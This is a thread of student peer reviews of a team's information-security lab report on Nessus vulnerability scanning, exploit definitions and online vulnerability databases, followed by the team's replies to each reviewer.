The results of the vulnerability database research provide some interesting insights into alternative uses of these sources. By using them as a source of information in this lab, we see how they can be used for bad as much as for good. The discussion on how the databases were selected and articles were picked at random would’ve fit better into the sparse handling of this section in the methodologies. The percentages of layer 7 vulnerabilities given with supporting literature shows a good depth of research for this section. While the data was good, I think some of the core concepts of this section’s research were missed, particularly the expertise involved in finding and possibly exploiting the vulnerability data listed in the databases.
The issue with the Windows XP SP3 firewall could use some further discussion. If it’s on and you are unable to scan it, the vulnerabilities still exist within the system, but is having the firewall turned on a sufficient mitigation strategy? Having the firewall turned on would’ve saved probably thousands of users’ PCs from the Sasser worm. Would it be better to test in the context of these lab exercises with it on or off?
The conclusion lacks cohesion between the various sections of the lab; instead, it states the main points and the fact that they were successful.
The proper tags were not submitted with the lab report, which is part of the directions for submission. Like many other teams, this team uses the word “we” a lot. I would like to see team or group instead of “we”. The verb tense in the abstract is grammatical incorrect, since this is the abstract it should be in the future tense. I found it interesting that the group called the OSI network stack model theoretical, what makes it theoretical? The group nicely tied in some of their previous findings in their introduction paragraphs. A lot of terms have been defined. I am assuming that these definitions are the group’s own words or definitions and not from some other source, since nothing is cited with them. If they are from another source or a summary from another source, please cite. The group’s last paragraph sounds like it belongs in the abstract or the methods section. The group’s literature review read and looked like a list instead of the cohesive format required. The citations for each article, not in APA 5 format, were placed after the section heading, which was the article title. If the following paragraphs are a summary or even text coming directly from the articles, the citations go after all of that, not before. While the literature review does summarize the articles, they do not answer all of the questions that are required for a literature review. A literature review is more than the summary of an article, but rather a critique of what was presented in the article. The group did talk about how the articles relate to the lab, but never state how the articles relate to each other.
It was nice to see that the group had various methods in mind for how to perform the laboratory experiment. The group explained why they chose the path they did, which is different from what the rest of the groups did. The group clearly stated what steps were taken to perform the lab experiment. I liked that the group went back to using the virtual Citrix environment instead of using their own machines, like they did for lab 3. Why is this group the only one that performed these attacks on multiple machines? Did the rest of the groups miss something that this group did not? I found it interesting the differences in the vulnerabilities from one operating system to the next. I would like to have seen more screenshots, preferably within the methods section. Most of the groups found the same repositories for the databases that contain lists of vulnerabilities. One item missing from the results section is the findings of the level of expertise for the exploit repositories. So part 2 is not fully answered. The group’s conclusion section is for the most part a rehash of the abstract. This is the discussion of their results, which I found great that this group is the only one that noticed the circularity found between the open-source exploit databases.
As always, team 3 does an excellent job of writing their abstract in such a way as to let the reader know exactly how they are going to proceed with the lab. The introduction as always was very insightful. The literature review contains their discussion of sources and is organized by publication. The summaries were well written but didn’t really tie the authors’ ideas into the lab exercise.
The methodology section was well written and had good details about the environment used to do the testing. The results section was well written and described the process of testing the exploit tools in much detail.
Their vulnerability database research section was interesting in that it explained how the sources were used. However, as with some of the other teams they spent a lot of effort describing the vulnerability database sources as opposed to detailing the levels of expertise needed to run the exploits listed on the vulnerability sites.
The number of vulnerabilities in layer 7 seems to fit with the findings of the other teams’ research.
In the abstract section of the laboratory report, team three gave a detailed overview of what was to be accomplished in the laboratory assignment.
In the introduction, team three gave a description of what an exploit is. The group states, “First, we must state that an ‘exploit’ is not inherently separate from other concepts such as ‘active’ or ‘passive’ reconnaissance, but can be a complementary part of these categories.” They went on to say that the term ‘exploit’ is simply a response to the concept of ‘opportunity,’ which they use to develop a definition within the scope of this exercise. The team also described the traits of an exploit, in that it must have three necessary components: opportunity, employment, and gain.
In the literature review section of the laboratory report, team three gave thorough summaries of the articles that were reviewed and related the articles back to the laboratory assignment. Team three did not seem to find any errors or omissions in any of the articles.
In the methodology section, team three was able to find out which vulnerabilities affected which virtual machine by running Nessus against all of the virtual machines. This approach was used by other teams as well, including the team I am on. I was not sure why the team performed the step where they stated that “The tests were performed and the results saved as an HTML report, which was then mailed to and accessed via an ‘offsite’ mail account for ease of examination.” The version of Nessus that my team was running allowed the team to view the results within the Nessus program and save the results so that the report could be referenced again in the future. Perhaps the configuration of the team’s version of Nessus was different from the one that was executed by my team.
In the results section team three listed Vulnerability Notes Database, Secunia, the National Vulnerability Database (NVD) and The Open Source Vulnerability Database (OSVDB) as on-line vulnerability identification sources. In determining the amount of expertise involved, team three concluded “Secunia was the only one of the four that appeared to have internal sources for vulnerability discovery and verification of both the vulnerability and the solution.” Team three did not appear to tabulate the vulnerabilities that were found online into a table based on the OSI model and McCumber’s cube.
In the issues section, I did not understand what the team meant when they stated, “Foremost, some vulnerabilities reported by NESSUS appeared largely ‘theoretical’ in nature, as no known exploit code was found capable of utilizing these vulnerabilities.” Nessus did find vulnerabilities in some services without going into much detail about the vulnerability; was that what the team meant, in that it gave no way to actually correct the vulnerability?
In the conclusion section, team three came to a similar conclusion that most of the other teams came to when they stated “we have found the majority of vulnerabilities to lie in the OSI model upper layers, largely in layer seven; and to be overwhelmingly associated with the technology-processing subspace of the McCumber cube construct. “
I think that group 3’s write-up for lab 4 was good. The abstract and introduction for this lab were very good. The literature review was also fairly good: the group answered all of the required questions for the literature review. All of the citations for the literature review were present, but not proper throughout the lab. The literature review was cited properly, except when including page numbers; the author and year of the reference should be included in addition to the page number. For part 1, many of the required sections were missing. The group basically ran a vulnerability scan against a target machine as their only form of research. The group’s findings lacked analysis of the scan, and most of what was included in their findings seemed more like methods. For part 2, the group did a good job of answering all of the required questions. However, the group only discusses vulnerability databases and not exploit-code databases. The conclusion to this laboratory was also well done because it accurately sums up their procedures and findings.
The team starts off with their abstract and explains what is going to happen within the lab. Then they describe what is going to be accomplished using different tools to test any exploits that they encounter. Next they go on to discuss possibilities for testing the systems. They define exploitation in their own terms to solidify their views going into this lab. One question that came to my mind when they went further into defining exploitation was: what if a user accidentally stumbled upon a vulnerability and did not know it? Would this be a form of exploitation if they modified or gained access just by accident? An example that I could think of would be someone using a “time machine,” going back in time, landing on a plant, and altering the outcome of the future. It is understood that the “time machine” would be the tool. The user or users, however, did not know that they would be altering the future by squashing a plant during their time travels. Next the group goes on to review the literature; again they separate the pieces of literature. Yes, they do at the end discuss some of the overarching themes, but there are no cohesive arguments or thoughts connecting the literature. It makes the literature review seem robotic, as though sections of the papers were pulled out, listed, and then described. Again, comparing and contrasting in a cohesive rather than split review would give readers the understanding that the team understands the topic and is not just listing details that have been found. Then they go on to discuss the methodologies and processes used within the hands-on portion of the lab. This was one of the few reports that actually acknowledged testing more than one operating system and the different exploitations found. They also stated that most of the vulnerabilities were found within the application layer of the OSI seven-layer model. I would have to agree with this point, as many of the attacks that exploit systems start with the application layer and then reach down. I am not saying that there are not attacks that exploit other layers; I just agree with what was found. Does the team feel that many attacks below the seventh layer are not discovered or detected as often? Or is it that many systems may be more secure at the lower levels, but when it comes to the application layer developers do not keep security in mind during the development life cycle? The team then goes on to discuss the issues that they had with the lab and the problems with the firewall on Windows XP SP3. Does the firewall provide a false sense of hope in many cases? Then once the firewall is down the attacks can really begin, and do developers of updates keep these exploits in mind? The team goes on to conclude with what they learned from the lab and that many of the exploits are found in the upper levels of the OSI seven-layer model. This was a good lab report; the methodology was the strong point of the report and has given this reader additional thoughts on the subject.
The team started with a strong abstract indicating the key points of their laboratory. They explained that the lab was to examine the purpose of security exploits. They propose a theoretical definition and then demonstrate exploits on the virtual hosts. The team then has an introduction, followed by their literature review. Both are in depth and provide great responses. The team uses the phrase “One cannot win a contest which does not exist.” To explain this they use the example of a password sniffed from the network being acted upon to exploit the system. I have a few questions: why must the password travel through the network? According to the setup of your virtual machines, local logins seem to be used, and they do not require network authentication. The explanation seems not to answer or explain the phrase. I might be missing something, but perhaps the explanation is that one cannot gather a password through a password sniffer because the environment does not require the use of network logins, or that certain exploits require a user’s input or perhaps a user’s carelessness.
The team has a choice of which tools to use, Nmap or Nessus. The team indicates that they are going to be using Nessus, like some of the other groups. I did wonder why the team decided to go with Nessus over Nmap. Since the team picked Nessus, they then went to the Nessus plug-in listing. Then it was discovered that this route was untenable because of the web interface. They then decided to use Common Vulnerabilities and Exposures listings to associate attacks with vulnerabilities. The team indicates that Nessus will be run on their Windows XP SP3 virtual machine, mainly because it was already installed. The team says the Nessus scan was run with all plug-ins. A question that I have is, what is considered all plug-ins; are there certain exploits that can be left out? What is considered “dangerous”; does this mean that the plug-in is going to break the target system?
@All: expertise is discussed, we just didn’t use the word. Perhaps it should have been made more clear.
@nbakker: seriously, what is your obsession with abstract length?
@mvanbode: Again with the tags? Really? Can you give me an example of any network stack that strictly follows OSI? You state,”The verb tense in the abstract is grammatical incorrect”. ‘Nuff said.
@tnovosel: the table was irrelevant.
In general, to all questions about turning off the firewall: the decision was somewhat arbitrary. We noted that neither of the other two Microsoft based machines had a firewall enabled, so we thought it fitting that the Windows XP SP 3 machine also should be without a firewall. It also allows examination of the evolution of the ‘base’ OS with respect to Windows XP, which we thought was useful, if not directly related to the lab exercise. Additionally, I think it makes sense to examine the security status of the unprotected OS in that the firewall is essentially a first line of defense. Once the firewall has been disabled (which is by no means a rare occurrence), the core OS must ‘stand on its own’ against any attack being made. Is the firewall a ‘false sense of security?’ No, it is an important defense mechanism, but it does not allow one to ignore other issues present with the OS under examination. Defense in depth is a time tested concept which ‘works.’
@nbakker: The issues with regard to lab seven were also on my mind when these ‘short lists’ were discovered. It will be interesting to see how it all plays out.
@jeikenbe, mvanbode with regards to testing multiple machines: was it wrong to test more than one machine? It didn’t seem to be that much more work, and it was something useful in planning for future lab exercises (i.e. lab seven).
@tnovosel with respect to emailing results offsite: if you hadn’t noticed, we are not big fans of VMware Workstation via Citrix. The biggest problem in this case is lack of ‘screen real estate.’ It is simply just easier to open up the results on a ‘big’ monitor with multiple tabs when sifting through them, versus trying to have multiple windows open on the tiny viewport presented by VMware workstation. With respect to ‘theoretical’ exploits: as we were looking for attack methods (and not corrective measures, as you suggest) this meant that a search for attack programs addressing the vulnerability resulted in finding nothing. Hence, exploit of these vulnerabilities is mostly ‘theoretical,’ at least at this time, as there are no known working implementations of attack. We would put these in the ‘could work’ category of exploits.
@prennick: We did a fair bit more than ‘just running a vulnerability scan’ as witnessed by our tables with specific attack methods discovered, and the descriptions of successful exploits using some of these means. What exactly do you mean by lack “…of analysis for the scan?” Should we have proposed reasons why some systems did not have certain vulnerabilities? I did not see this requirement in the lab instructions: indeed, this might have been considered ‘unrelated to the lab’ by some.
@shumpfer: I’m not really following the “time machine crushes plant” example (this is science fiction: how is it anything more than raw speculation?), but as far as the ‘accidental’ nature of opportunity, I would suggest many vulnerabilities are found ‘accidentally’ or randomly (e.g. fuzzing program inputs, etc.): it really is a matter of what is done with this knowledge after it is discovered.
@chaveza: We arbitrarily chose Nessus because it was one of two valid options; need we rationalize it further? The various configuration parameters of Nessus are well documented: the ‘default’ settings disable any plug-ins which can take down the remote host. The ‘all’ is, well, ‘all plug-ins available.’ This becomes an important distinction from the ‘default’ configuration, which I believe is demonstrated by our results. The question on the ‘password’ scenario: it was a general example, and not specifically meant to relate to our test setup. It does not attempt to address ‘all’ password attack scenarios. I think what you are referring to is a ‘weak password’ exploit: this is using a different vulnerability than ‘unprotected’ passwords or data, and so is another category altogether.